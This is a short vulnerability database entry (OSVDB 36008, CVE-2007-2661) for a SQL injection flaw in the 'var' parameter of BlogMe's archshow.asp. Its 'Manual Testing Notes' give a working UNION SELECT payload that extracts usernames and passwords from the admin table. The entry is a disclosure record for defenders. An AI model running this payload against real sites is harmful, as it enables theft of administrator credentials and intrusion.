BlogMe archshow.asp var Variable SQL Injection

2007-05-13T04:34:00
ID OSVDB:36008
Type osvdb
Reporter OSVDB
Modified 2007-05-13T04:34:00

Description

Manual Testing Notes

/blogme/archshow.asp?var=-99%20Union+all+select+0,1,2,3,4,username,password,7,8,9,10,0+from+admin

References:

Secunia Advisory ID:25229 ISS X-Force ID: 34253 Generic Exploit URL: http://www.milw0rm.com/exploits/3914 FrSIRT Advisory: ADV-2007-1784 CVE-2007-2661 Bugtraq ID: 23956